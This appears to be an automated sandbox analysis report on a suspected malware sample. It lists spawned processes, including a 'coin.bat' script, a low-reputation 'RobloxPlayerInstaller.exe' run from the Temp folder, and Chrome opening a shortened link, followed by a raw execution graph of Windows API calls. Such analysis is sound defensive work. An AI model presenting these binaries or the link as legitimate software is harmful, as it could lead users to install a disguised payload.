                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" "
                                                                            Imagebase:0x7ff7e0370000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:3
                                                                            Start time:18:56:32
                                                                            Start date:29/07/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff66e660000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:4
                                                                            Start time:18:56:32
                                                                            Start date:29/07/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe"
                                                                            Imagebase:0xf40000
                                                                            File size:5'720'984 bytes
                                                                            MD5 hash:27469372591B14FF1C57654FACB5E020
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 0%, ReversingLabs
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:18:56:45
                                                                            Start date:29/07/2024
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:cmd
                                                                            Imagebase:0x7ff7e0370000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:6
                                                                            Start time:18:56:45
                                                                            Start date:29/07/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff66e660000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:8
                                                                            Start time:18:56:46
                                                                            Start date:29/07/2024
                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6
                                                                            Imagebase:0x7ff684c40000
                                                                            File size:3'242'272 bytes
                                                                            MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:11
                                                                            Start time:18:56:47
                                                                            Start date:29/07/2024
                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1688 --field-trial-handle=1980,i,3286908272416009532,3896627819344561856,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                            Imagebase:0x7ff684c40000
                                                                            File size:3'242'272 bytes
                                                                            MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                              Execution Graph

                                                                              Execution Coverage:11.7%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:27.6%
                                                                              Total number of Nodes:2000
                                                                              Total number of Limit Nodes:26
26380->26382 26388 7ff693e6cc80 26380->26388 26384 7ff693e6cc7b 26382->26384 26385 7ff693e6cc20 26382->26385 26387 7ff693e6cbc6 26382->26387 26419 7ff693e51f80 33 API calls 3 library calls 26384->26419 26385->26387 26389 7ff693e821d0 33 API calls 26385->26389 26387->26364 26420 7ff693e52004 33 API calls std::_Xinvalid_argument 26388->26420 26389->26387 26391 7ff693e89f4e 26390->26391 26392 7ff693e89f36 26390->26392 26391->26392 26394 7ff693e89f58 26391->26394 26421 7ff693e8d69c 15 API calls _set_fmode 26392->26421 26423 7ff693e87ef0 35 API calls 2 library calls 26394->26423 26395 7ff693e89f3b 26422 7ff693e878e4 31 API calls _invalid_parameter_noinfo 26395->26422 26398 7ff693e82320 _handle_error 8 API calls 26400 7ff693e8a10b 26398->26400 26399 7ff693e89f69 __scrt_get_show_window_mode 26424 7ff693e87e70 15 API calls _set_fmode 26399->26424 26400->26364 26402 7ff693e89fd4 26425 7ff693e882f8 46 API calls 3 library calls 26402->26425 26404 7ff693e89fdd 26405 7ff693e8a014 26404->26405 26406 7ff693e89fe5 26404->26406 26408 7ff693e8a06c 26405->26408 26409 7ff693e8a092 26405->26409 26410 7ff693e8a023 26405->26410 26411 7ff693e8a01a 26405->26411 26426 7ff693e8d90c 26406->26426 26412 7ff693e8d90c __free_lconv_num 15 API calls 26408->26412 26409->26408 26413 7ff693e8a09c 26409->26413 26414 7ff693e8d90c __free_lconv_num 15 API calls 26410->26414 26411->26408 26411->26410 26416 7ff693e89f46 26412->26416 26415 7ff693e8d90c __free_lconv_num 15 API calls 26413->26415 26414->26416 26415->26416 26416->26398 26417->26364 26418->26366 26419->26388 26421->26395 26422->26416 26423->26399 26424->26402 26425->26404 26427 7ff693e8d911 RtlRestoreThreadPreferredUILanguages 26426->26427 26431 7ff693e8d941 __free_lconv_num 26426->26431 26428 7ff693e8d92c 26427->26428 26427->26431 26432 7ff693e8d69c 15 API calls _set_fmode 26428->26432 26430 7ff693e8d931 GetLastError 26430->26431 26431->26416 26432->26430 26434 7ff693e520f6 26433->26434 26436 7ff693e520cb BuildCatchObjectHelperInternal 
26433->26436 26437 7ff693e51474 33 API calls 3 library calls 26434->26437 26436->26080 26437->26436 26439 7ff693e7879b 26438->26439 26440 7ff693e7864f SizeofResource 26438->26440 26439->26124 26440->26439 26441 7ff693e78669 LoadResource 26440->26441 26441->26439 26442 7ff693e78682 LockResource 26441->26442 26442->26439 26443 7ff693e78697 GlobalAlloc 26442->26443 26443->26439 26444 7ff693e786b8 GlobalLock 26443->26444 26445 7ff693e78792 GlobalFree 26444->26445 26446 7ff693e786ca BuildCatchObjectHelperInternal 26444->26446 26445->26439 26447 7ff693e78789 GlobalUnlock 26446->26447 26448 7ff693e786f6 GdipAlloc 26446->26448 26447->26445 26449 7ff693e7870b 26448->26449 26449->26447 26450 7ff693e7875a GdipCreateHBITMAPFromBitmap 26449->26450 26451 7ff693e78772 26449->26451 26450->26451 26451->26447 26453 7ff693e784cc 4 API calls 26452->26453 26454 7ff693e784aa 26453->26454 26456 7ff693e784b9 26454->26456 26463 7ff693e78504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26454->26463 26456->26127 26456->26128 26456->26129 26457->26132 26459 7ff693e784e3 26458->26459 26460 7ff693e784de 26458->26460 26462 7ff693e78df4 16 API calls _handle_error 26459->26462 26464 7ff693e78590 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26460->26464 26462->26137 26463->26456 26464->26459 26468 7ff693e698fe _snwprintf 26465->26468 26466 7ff693e69973 26583 7ff693e668b0 48 API calls 26466->26583 26468->26466 26470 7ff693e69a89 26468->26470 26469 7ff693e51fa0 31 API calls 26472 7ff693e699fd 26469->26472 26470->26472 26473 7ff693e520b0 33 API calls 26470->26473 26471 7ff693e6997d BuildCatchObjectHelperInternal 26471->26469 26530 7ff693e6a42e 26471->26530 26534 7ff693e624c0 26472->26534 26473->26472 26474 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26476 7ff693e6a434 26474->26476 26479 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26476->26479 26478 7ff693e69a22 26481 7ff693e6204c 100 API calls 26478->26481 26482 7ff693e6a43a 26479->26482 26480 7ff693e69b17 26552 
7ff693e8a450 26480->26552 26484 7ff693e69a2b 26481->26484 26484->26476 26487 7ff693e69a66 26484->26487 26486 7ff693e69aad 26486->26480 26488 7ff693e68e58 33 API calls 26486->26488 26490 7ff693e82320 _handle_error 8 API calls 26487->26490 26488->26486 26489 7ff693e8a450 31 API calls 26502 7ff693e69b57 __vcrt_FlsAlloc 26489->26502 26491 7ff693e6a40e 26490->26491 26491->26140 26492 7ff693e69c89 26493 7ff693e62aa0 101 API calls 26492->26493 26505 7ff693e69d5c 26492->26505 26496 7ff693e69ca1 26493->26496 26497 7ff693e628d0 104 API calls 26496->26497 26496->26505 26503 7ff693e69cc9 26497->26503 26502->26492 26502->26505 26560 7ff693e62bb0 26502->26560 26569 7ff693e628d0 26502->26569 26574 7ff693e62aa0 26502->26574 26503->26505 26526 7ff693e69cd7 __vcrt_FlsAlloc 26503->26526 26584 7ff693e70bbc MultiByteToWideChar 26503->26584 26579 7ff693e6204c 26505->26579 26506 7ff693e6a1ec 26515 7ff693e6a2c2 26506->26515 26590 7ff693e8cf90 31 API calls 2 library calls 26506->26590 26508 7ff693e6a157 26508->26506 26587 7ff693e8cf90 31 API calls 2 library calls 26508->26587 26509 7ff693e6a14b 26509->26140 26512 7ff693e6a249 26591 7ff693e8b7bc 31 API calls _invalid_parameter_noinfo_noreturn 26512->26591 26513 7ff693e6a3a2 26516 7ff693e8a450 31 API calls 26513->26516 26514 7ff693e6a2ae 26514->26515 26592 7ff693e68cd0 33 API calls 2 library calls 26514->26592 26515->26513 26517 7ff693e68e58 33 API calls 26515->26517 26519 7ff693e6a3cb 26516->26519 26517->26515 26521 7ff693e8a450 31 API calls 26519->26521 26520 7ff693e6a16d 26588 7ff693e8b7bc 31 API calls _invalid_parameter_noinfo_noreturn 26520->26588 26521->26505 26523 7ff693e6a1d8 26523->26506 26589 7ff693e68cd0 33 API calls 2 library calls 26523->26589 26524 7ff693e70f68 WideCharToMultiByte 26524->26526 26526->26505 26526->26506 26526->26508 26526->26509 26526->26524 26527 7ff693e6a429 26526->26527 26585 7ff693e6aa88 45 API calls 2 library calls 26526->26585 26586 7ff693e8a270 31 API calls 2 library calls 26526->26586 26593 7ff693e82624 
8 API calls 26527->26593 26530->26474 26533 7ff693e6a468 26532->26533 26533->26142 26535 7ff693e624fd CreateFileW 26534->26535 26537 7ff693e625ae GetLastError 26535->26537 26546 7ff693e6266e 26535->26546 26538 7ff693e66a0c 49 API calls 26537->26538 26539 7ff693e625dc 26538->26539 26540 7ff693e625e0 CreateFileW GetLastError 26539->26540 26545 7ff693e6262c 26539->26545 26540->26545 26541 7ff693e626b1 SetFileTime 26544 7ff693e626cf 26541->26544 26542 7ff693e62708 26543 7ff693e82320 _handle_error 8 API calls 26542->26543 26547 7ff693e6271b 26543->26547 26544->26542 26548 7ff693e520b0 33 API calls 26544->26548 26545->26546 26549 7ff693e62736 26545->26549 26546->26541 26546->26544 26547->26478 26547->26486 26548->26542 26550 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26549->26550 26551 7ff693e6273b 26550->26551 26553 7ff693e8a47d 26552->26553 26559 7ff693e8a492 26553->26559 26594 7ff693e8d69c 15 API calls _set_fmode 26553->26594 26555 7ff693e8a487 26595 7ff693e878e4 31 API calls _invalid_parameter_noinfo 26555->26595 26557 7ff693e82320 _handle_error 8 API calls 26558 7ff693e69b37 26557->26558 26558->26489 26559->26557 26561 7ff693e62bcd 26560->26561 26563 7ff693e62be9 26560->26563 26562 7ff693e62bfb 26561->26562 26596 7ff693e5b9c4 99 API calls Concurrency::cancel_current_task 26561->26596 26562->26502 26563->26562 26565 7ff693e62c01 SetFilePointer 26563->26565 26565->26562 26566 7ff693e62c1e GetLastError 26565->26566 26566->26562 26567 7ff693e62c28 26566->26567 26567->26562 26597 7ff693e5b9c4 99 API calls Concurrency::cancel_current_task 26567->26597 26570 7ff693e628f6 26569->26570 26573 7ff693e628fd 26569->26573 26570->26502 26571 7ff693e62320 GetStdHandle ReadFile GetLastError GetLastError GetFileType 26571->26573 26573->26570 26573->26571 26598 7ff693e5b8a4 99 API calls Concurrency::cancel_current_task 26573->26598 26599 7ff693e62778 26574->26599 26577 7ff693e62ac7 26577->26502 26580 7ff693e62066 26579->26580 26581 7ff693e62072 26579->26581 
26580->26581 26607 7ff693e620d0 26580->26607 26583->26471 26584->26526 26585->26526 26586->26526 26587->26520 26588->26523 26589->26506 26590->26512 26591->26514 26592->26515 26593->26530 26594->26555 26595->26559 26605 7ff693e62789 _snwprintf 26599->26605 26600 7ff693e62890 SetFilePointer 26602 7ff693e628b8 GetLastError 26600->26602 26604 7ff693e627b5 26600->26604 26601 7ff693e82320 _handle_error 8 API calls 26603 7ff693e6281d 26601->26603 26602->26604 26603->26577 26606 7ff693e5b9c4 99 API calls Concurrency::cancel_current_task 26603->26606 26604->26601 26605->26600 26605->26604 26608 7ff693e620ea 26607->26608 26609 7ff693e62102 26607->26609 26608->26609 26611 7ff693e620f6 FindCloseChangeNotification 26608->26611 26610 7ff693e62126 26609->26610 26613 7ff693e5b544 99 API calls 26609->26613 26610->26581 26611->26609 26613->26610 26614->26152 26616->26156 26618 7ff693e8154b 26619 7ff693e814a2 26618->26619 26621 7ff693e81900 26619->26621 26647 7ff693e81558 26621->26647 26624 7ff693e8198b 26625 7ff693e81868 DloadReleaseSectionWriteAccess 6 API calls 26624->26625 26626 7ff693e81998 RaiseException 26625->26626 26640 7ff693e81bb5 26626->26640 26627 7ff693e819b4 26628 7ff693e81a3d LoadLibraryExA 26627->26628 26629 7ff693e81aa9 26627->26629 26631 7ff693e81b85 26627->26631 26636 7ff693e81abd 26627->26636 26628->26629 26630 7ff693e81a54 GetLastError 26628->26630 26634 7ff693e81ab4 FreeLibrary 26629->26634 26629->26636 26632 7ff693e81a69 26630->26632 26633 7ff693e81a7e 26630->26633 26655 7ff693e81868 26631->26655 26632->26629 26632->26633 26638 7ff693e81868 DloadReleaseSectionWriteAccess 6 API calls 26633->26638 26634->26636 26635 7ff693e81b1b GetProcAddress 26635->26631 26639 7ff693e81b30 GetLastError 26635->26639 26636->26631 26636->26635 26641 7ff693e81a8b RaiseException 26638->26641 26642 7ff693e81b45 26639->26642 26640->26619 26641->26640 26642->26631 26643 7ff693e81868 DloadReleaseSectionWriteAccess 6 API calls 26642->26643 26644 7ff693e81b67 RaiseException 26643->26644 
26645 7ff693e81558 _com_raise_error 6 API calls 26644->26645 26646 7ff693e81b81 26645->26646 26646->26631 26648 7ff693e8156e 26647->26648 26654 7ff693e815d3 26647->26654 26663 7ff693e81604 26648->26663 26651 7ff693e815ce 26653 7ff693e81604 DloadReleaseSectionWriteAccess 3 API calls 26651->26653 26653->26654 26654->26624 26654->26627 26656 7ff693e81878 26655->26656 26662 7ff693e818d1 26655->26662 26657 7ff693e81604 DloadReleaseSectionWriteAccess 3 API calls 26656->26657 26658 7ff693e8187d 26657->26658 26659 7ff693e818cc 26658->26659 26660 7ff693e817d8 DloadProtectSection 3 API calls 26658->26660 26661 7ff693e81604 DloadReleaseSectionWriteAccess 3 API calls 26659->26661 26660->26659 26661->26662 26662->26640 26664 7ff693e81573 26663->26664 26665 7ff693e8161f 26663->26665 26664->26651 26670 7ff693e817d8 26664->26670 26665->26664 26666 7ff693e81624 GetModuleHandleW 26665->26666 26667 7ff693e8163e GetProcAddress 26666->26667 26669 7ff693e81639 26666->26669 26668 7ff693e81653 GetProcAddress 26667->26668 26667->26669 26668->26669 26669->26664 26673 7ff693e817fa DloadProtectSection 26670->26673 26671 7ff693e81802 26671->26651 26672 7ff693e8183a VirtualProtect 26672->26671 26673->26671 26673->26672 26675 7ff693e816a4 VirtualQuery GetSystemInfo 26673->26675 26675->26672 26676 7ff693e81491 26677 7ff693e813c9 26676->26677 26677->26676 26678 7ff693e81900 _com_raise_error 14 API calls 26677->26678 26678->26677 26679 7ff693e820f0 26680 7ff693e82106 _com_error::_com_error 26679->26680 26685 7ff693e84078 26680->26685 26682 7ff693e82117 26683 7ff693e81900 _com_raise_error 14 API calls 26682->26683 26684 7ff693e82163 26683->26684 26686 7ff693e84097 26685->26686 26687 7ff693e840b4 RtlPcToFileHeader 26685->26687 26686->26687 26688 7ff693e840cc 26687->26688 26689 7ff693e840db RaiseException 26687->26689 26688->26689 26689->26682 26690 7ff693e803e0 26691 7ff693e80497 26690->26691 26692 7ff693e8041f 26690->26692 26693 7ff693e6aae0 48 API calls 26691->26693 26694 7ff693e6aae0 48 API calls 
26692->26694 26695 7ff693e804ab 26693->26695 26696 7ff693e80433 26694->26696 26697 7ff693e6da98 48 API calls 26695->26697 26698 7ff693e6da98 48 API calls 26696->26698 26701 7ff693e80442 BuildCatchObjectHelperInternal 26697->26701 26698->26701 26699 7ff693e51fa0 31 API calls 26700 7ff693e80541 26699->26700 26715 7ff693e5250c 26700->26715 26701->26699 26706 7ff693e805cc 26701->26706 26714 7ff693e805c6 26701->26714 26703 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26703->26706 26704 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26707 7ff693e805d2 26704->26707 26706->26704 26714->26703 26716 7ff693e52516 SetDlgItemTextW 26715->26716 26717 7ff693e52513 26715->26717 26717->26716 26718 7ff693e7b190 27061 7ff693e5255c 26718->27061 26720 7ff693e7b1db 26721 7ff693e7be93 26720->26721 26722 7ff693e7b1ef 26720->26722 26872 7ff693e7b20c 26720->26872 27327 7ff693e7f390 26721->27327 26726 7ff693e7b2db 26722->26726 26727 7ff693e7b1ff 26722->26727 26722->26872 26725 7ff693e82320 _handle_error 8 API calls 26730 7ff693e7c350 26725->26730 26733 7ff693e7b391 26726->26733 26738 7ff693e7b2f5 26726->26738 26731 7ff693e7b2a9 26727->26731 26732 7ff693e7b207 26727->26732 26728 7ff693e7beba IsDlgButtonChecked 26729 7ff693e7bec9 26728->26729 26735 7ff693e7bed5 SendDlgItemMessageW 26729->26735 26736 7ff693e7bef0 GetDlgItem IsDlgButtonChecked 26729->26736 26737 7ff693e7b2cb EndDialog 26731->26737 26731->26872 26741 7ff693e6aae0 48 API calls 26732->26741 26732->26872 27069 7ff693e522bc GetDlgItem 26733->27069 26735->26736 26740 7ff693e662dc 35 API calls 26736->26740 26737->26872 26742 7ff693e6aae0 48 API calls 26738->26742 26743 7ff693e7bf47 GetDlgItem 26740->26743 26744 7ff693e7b236 26741->26744 26745 7ff693e7b313 SetDlgItemTextW 26742->26745 27346 7ff693e52520 26743->27346 27350 7ff693e51ec4 34 API calls _handle_error 26744->27350 26746 7ff693e7b326 26745->26746 26755 7ff693e7b340 GetMessageW 26746->26755 26746->26872 26749 7ff693e7b408 GetDlgItem 26750 
7ff693e7b422 IsDlgButtonChecked IsDlgButtonChecked 26749->26750 26751 7ff693e7b44f SetFocus 26749->26751 26750->26751 26756 7ff693e7b465 26751->26756 26757 7ff693e7b4f2 26751->26757 26754 7ff693e7b246 26760 7ff693e7b25c 26754->26760 26761 7ff693e5250c SetDlgItemTextW 26754->26761 26763 7ff693e7b35e IsDialogMessageW 26755->26763 26755->26872 26764 7ff693e6aae0 48 API calls 26756->26764 27083 7ff693e58d04 26757->27083 26758 7ff693e7b3da 26766 7ff693e51fa0 31 API calls 26758->26766 26775 7ff693e7c363 26760->26775 26760->26872 26761->26760 26763->26746 26770 7ff693e7b373 TranslateMessage DispatchMessageW 26763->26770 26771 7ff693e7b46f 26764->26771 26765 7ff693e7bcc5 26772 7ff693e6aae0 48 API calls 26765->26772 26766->26872 26769 7ff693e7b52c 27093 7ff693e7ef80 26769->27093 26770->26746 26784 7ff693e5129c 33 API calls 26771->26784 26776 7ff693e7bcd6 SetDlgItemTextW 26772->26776 26780 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26775->26780 26779 7ff693e6aae0 48 API calls 26776->26779 26785 7ff693e7bd08 26779->26785 26786 7ff693e7c368 26780->26786 26783 7ff693e6aae0 48 API calls 26788 7ff693e7b555 26783->26788 26789 7ff693e7b498 26784->26789 26802 7ff693e5129c 33 API calls 26785->26802 26795 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26786->26795 26792 7ff693e6da98 48 API calls 26788->26792 26793 7ff693e7f0a4 24 API calls 26789->26793 26799 7ff693e7b568 26792->26799 26800 7ff693e7b4a5 26793->26800 26803 7ff693e7c36e 26795->26803 27107 7ff693e7f0a4 26799->27107 26800->26786 26816 7ff693e7b4e8 26800->26816 26824 7ff693e7bd31 26802->26824 26807 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26803->26807 26817 7ff693e7c374 26807->26817 26813 7ff693e7bdda 26819 7ff693e6aae0 48 API calls 26813->26819 26815 7ff693e7b5ec 26827 7ff693e7b61a 26815->26827 27352 7ff693e632a8 26815->27352 26816->26815 27351 7ff693e7fa80 33 API calls 2 library calls 26816->27351 26837 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 
26817->26837 26829 7ff693e7bde4 26819->26829 26822 7ff693e51fa0 31 API calls 26832 7ff693e7b586 26822->26832 26824->26813 26838 7ff693e5129c 33 API calls 26824->26838 27121 7ff693e62f58 26827->27121 26849 7ff693e5129c 33 API calls 26829->26849 26832->26803 26832->26816 26843 7ff693e7c37a 26837->26843 26844 7ff693e7bd7f 26838->26844 26853 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26843->26853 26850 7ff693e6aae0 48 API calls 26844->26850 26847 7ff693e7b64c 27133 7ff693e67fc4 26847->27133 26848 7ff693e7b634 GetLastError 26848->26847 26854 7ff693e7be0d 26849->26854 26856 7ff693e7bd8a 26850->26856 26852 7ff693e7b60e 27355 7ff693e79d90 12 API calls _handle_error 26852->27355 26860 7ff693e7c380 26853->26860 26870 7ff693e5129c 33 API calls 26854->26870 26862 7ff693e51150 33 API calls 26856->26862 26869 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26860->26869 26865 7ff693e7bda2 26862->26865 26864 7ff693e7b65e 26867 7ff693e7b665 GetLastError 26864->26867 26868 7ff693e7b674 26864->26868 26876 7ff693e52034 33 API calls 26865->26876 26867->26868 26875 7ff693e7b72b 26868->26875 26877 7ff693e7b68b GetTickCount 26868->26877 26963 7ff693e7b71c 26868->26963 26873 7ff693e7c386 26869->26873 26874 7ff693e7be4e 26870->26874 26872->26725 26878 7ff693e5255c 61 API calls 26873->26878 26890 7ff693e51fa0 31 API calls 26874->26890 26879 7ff693e7ba50 26875->26879 26884 7ff693e66454 34 API calls 26875->26884 26880 7ff693e7bdbe 26876->26880 27136 7ff693e54228 26877->27136 26882 7ff693e7c3e4 26878->26882 26887 7ff693e7b3b1 EndDialog 26879->26887 27364 7ff693e5bd0c 33 API calls 26879->27364 26885 7ff693e51fa0 31 API calls 26880->26885 26889 7ff693e7c3e8 26882->26889 26898 7ff693e7c489 GetDlgItem SetFocus 26882->26898 26940 7ff693e7c3fd 26882->26940 26892 7ff693e7b74e 26884->26892 26893 7ff693e7bdcc 26885->26893 26887->26758 26899 7ff693e82320 _handle_error 8 API calls 26889->26899 26897 7ff693e7be78 26890->26897 27356 7ff693e6b914 102 API calls 26892->27356 
26902 7ff693e51fa0 31 API calls 26893->26902 26895 7ff693e7bb79 26912 7ff693e6aae0 48 API calls 26895->26912 26896 7ff693e7ba75 27365 7ff693e51150 26896->27365 26906 7ff693e51fa0 31 API calls 26897->26906 26903 7ff693e7c4ba 26898->26903 26909 7ff693e7ca97 26899->26909 26902->26813 26918 7ff693e5129c 33 API calls 26903->26918 26904 7ff693e7b6ba 26911 7ff693e51fa0 31 API calls 26904->26911 26908 7ff693e7be83 26906->26908 26907 7ff693e7ba8a 26914 7ff693e6aae0 48 API calls 26907->26914 26915 7ff693e51fa0 31 API calls 26908->26915 26910 7ff693e7b768 26917 7ff693e6da98 48 API calls 26910->26917 26919 7ff693e7b6c8 26911->26919 26913 7ff693e7bba7 SetDlgItemTextW 26912->26913 26920 7ff693e52534 26913->26920 26921 7ff693e7ba97 26914->26921 26915->26758 26916 7ff693e7c434 SendDlgItemMessageW 26922 7ff693e7c45d EndDialog 26916->26922 26923 7ff693e7c454 26916->26923 26924 7ff693e7b7aa GetCommandLineW 26917->26924 26925 7ff693e7c4cc 26918->26925 27146 7ff693e62134 26919->27146 26926 7ff693e7bbc5 SetDlgItemTextW GetDlgItem 26920->26926 26927 7ff693e51150 33 API calls 26921->26927 26922->26889 26923->26922 26928 7ff693e7b869 26924->26928 26929 7ff693e7b84f 26924->26929 27369 7ff693e680d8 33 API calls 26925->27369 26932 7ff693e7bc13 26926->26932 26933 7ff693e7bbf0 GetWindowLongPtrW SetWindowLongPtrW 26926->26933 26934 7ff693e7baaa 26927->26934 27357 7ff693e7ab54 33 API calls _handle_error 26928->27357 26947 7ff693e520b0 33 API calls 26929->26947 27162 7ff693e7ce88 26932->27162 26933->26932 26939 7ff693e51fa0 31 API calls 26934->26939 26935 7ff693e7c4e0 26941 7ff693e5250c SetDlgItemTextW 26935->26941 26946 7ff693e7bab5 26939->26946 26940->26889 26940->26916 26948 7ff693e7c4f4 26941->26948 26942 7ff693e7b87a 27358 7ff693e7ab54 33 API calls _handle_error 26942->27358 26943 7ff693e7b6f5 GetLastError 26944 7ff693e7b704 26943->26944 26950 7ff693e6204c 100 API calls 26944->26950 26952 7ff693e51fa0 31 API calls 26946->26952 26947->26928 26956 7ff693e7c526 SendDlgItemMessageW FindFirstFileW 
26948->26956 26954 7ff693e7b711 26950->26954 26951 7ff693e7ce88 160 API calls 26955 7ff693e7bc3c 26951->26955 26960 7ff693e7bac3 26952->26960 26953 7ff693e7b88b 27359 7ff693e7ab54 33 API calls _handle_error 26953->27359 26958 7ff693e51fa0 31 API calls 26954->26958 27312 7ff693e7f974 26955->27312 26961 7ff693e7c57b 26956->26961 27054 7ff693e7ca04 26956->27054 26958->26963 26968 7ff693e6aae0 48 API calls 26960->26968 26972 7ff693e6aae0 48 API calls 26961->26972 26962 7ff693e7b89c 27360 7ff693e6b9b4 102 API calls 26962->27360 26963->26875 26963->26895 26966 7ff693e7ca81 26966->26889 26967 7ff693e7ce88 160 API calls 26983 7ff693e7bc6a 26967->26983 26971 7ff693e7badb 26968->26971 26969 7ff693e7b8b3 27361 7ff693e7fbdc 33 API calls 26969->27361 26970 7ff693e7caa9 26975 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26970->26975 26984 7ff693e5129c 33 API calls 26971->26984 26977 7ff693e7c59e 26972->26977 26974 7ff693e7b8d2 CreateFileMappingW 26978 7ff693e7b953 ShellExecuteExW 26974->26978 26979 7ff693e7b911 MapViewOfFile 26974->26979 26980 7ff693e7caae 26975->26980 26976 7ff693e7bc96 27326 7ff693e52298 GetDlgItem EnableWindow 26976->27326 26986 7ff693e5129c 33 API calls 26977->26986 27001 7ff693e7b974 26978->27001 27362 7ff693e83640 26979->27362 26987 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26980->26987 26983->26976 26988 7ff693e7ce88 160 API calls 26983->26988 26995 7ff693e7bb04 26984->26995 26985 7ff693e7b3f5 26985->26765 26985->26887 26989 7ff693e7c5cd 26986->26989 26990 7ff693e7cab4 26987->26990 26988->26976 26991 7ff693e51150 33 API calls 26989->26991 26994 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26990->26994 26992 7ff693e7c5e8 26991->26992 27370 7ff693e5e164 33 API calls 2 library calls 26992->27370 26993 7ff693e7b9c3 27002 7ff693e7b9dc UnmapViewOfFile CloseHandle 26993->27002 27003 7ff693e7b9ef 26993->27003 26998 7ff693e7caba 26994->26998 26995->26843 26996 7ff693e7bb5a 26995->26996 26999 7ff693e51fa0 31 API 
calls 26996->26999 27006 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 26998->27006 26999->26887 27000 7ff693e7c5ff 27004 7ff693e51fa0 31 API calls 27000->27004 27001->26993 27008 7ff693e7b9b1 Sleep 27001->27008 27002->27003 27003->26817 27005 7ff693e7ba25 27003->27005 27007 7ff693e7c60c 27004->27007 27010 7ff693e51fa0 31 API calls 27005->27010 27009 7ff693e7cac0 27006->27009 27007->26980 27012 7ff693e51fa0 31 API calls 27007->27012 27008->26993 27008->27001 27013 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27009->27013 27011 7ff693e7ba42 27010->27011 27014 7ff693e51fa0 31 API calls 27011->27014 27015 7ff693e7c673 27012->27015 27016 7ff693e7cac6 27013->27016 27014->26879 27017 7ff693e5250c SetDlgItemTextW 27015->27017 27019 7ff693e87904 _invalid_parameter_noinfo_noreturn 31 API calls 27016->27019 27018 7ff693e7c687 FindClose 27017->27018 27020 7ff693e7c797 SendDlgItemMessageW 27018->27020 27021 7ff693e7c6a3 27018->27021 27022 7ff693e7cacc 27019->27022 27023 7ff693e7c7cb 27020->27023 27371 7ff693e7a2cc 10 API calls _handle_error 27021->27371 27026 7ff693e6aae0 48 API calls 27023->27026 27025 7ff693e7c6c6 27027 7ff693e6aae0 48 API calls 27025->27027 27028 7ff693e7c7d8 